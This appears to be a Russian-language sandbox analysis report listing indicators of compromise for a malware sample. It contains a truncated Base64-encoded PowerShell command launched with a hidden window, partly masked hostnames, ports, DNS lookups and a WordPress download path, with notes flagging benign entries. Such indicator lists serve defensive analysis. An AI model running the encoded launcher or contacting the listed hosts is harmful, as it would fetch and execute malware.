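Техническая информация
(Символы # в именах узлов ниже — маскировка, выполненная источником; полные значения на странице не приведены.)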
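- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQgBsAG0AYwB6AHoAaABhAGoAcwBoAGMAawAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBTAGoAdgBxAHIAZgB5AGsAIAAjAD4AIAAkAEkAZABnAGYAZQBtAGEAbQA9ACcATABzAGoAcABjA...
  (Примечание: `-en` — сокращённая запись параметра `-EncodedCommand`; аргумент представляет собой Base64 от строки в кодировке UTF-16LE. Видимая часть декодируется в `<# Blmczzhajshck https://www.microsoft.com/Sjvqrfyk #> $Idgfemam='Lsjpc…`, то есть URL microsoft.com находится внутри блочного комментария PowerShell, не выполняется и индикатором компрометации не является. Остальная часть команды на странице обрезана.)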
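- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %TEMP%\1235184.cvr
  (Примечание: DW20.EXE — штатный компонент отчётов об ошибках Microsoft Office, а .cvr — файл его данных о сбое; их появление, по-видимому, отражает аварийное завершение приложения Office при анализе образца, а не вредоносную нагрузку.)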
- 'vi##.#ndonesia.nl':443
- 'de#####yle.ig.com.br':80
- 'de#####yle.ig.com.br':443
- 'pk#.goog':80
- 'ps########nterne.inscription.psl.eu':443
- http://de#####yle.ig.com.br/wp-content/languages/gtra6/
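- http://pk#.goog/gsr1/gsr1.crt
  (Примечание: путь /gsr1/gsr1.crt характерен для загрузки корневого сертификата Google Trust Services при проверке цепочки TLS; вероятно, это служебный запрос системы, а не обращение к серверу злоумышленника. Перед добавлением этого узла в списки блокировки стоит это проверить.)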
- 'vi##.#ndonesia.nl':443
- 'de#####yle.ig.com.br':443
- 'ps########nterne.inscription.psl.eu':443
- DNS ASK ja#######ta.000webhostapp.com
- DNS ASK vi##.#ndonesia.nl
- DNS ASK de#####yle.ig.com.br
- DNS ASK pk#.goog
- DNS ASK ed######.embuguacu.sp.gov.br
- DNS ASK ps########nterne.inscription.psl.eu
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en PAAjACAAQgBsAG0AYwB6AHoAaABhAGoAcwBoAGMAawAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAG0AaQBjAHIAbwBzAG8AZgB0AC4AYwBvAG0ALwBTAGoAdgBxAHIAZgB5AGsAIAAjAD4AIAAkAEkAZABnAGYAZQBtAGEAbQA9ACcATABzAGoAcABjA... (со скрытым окном)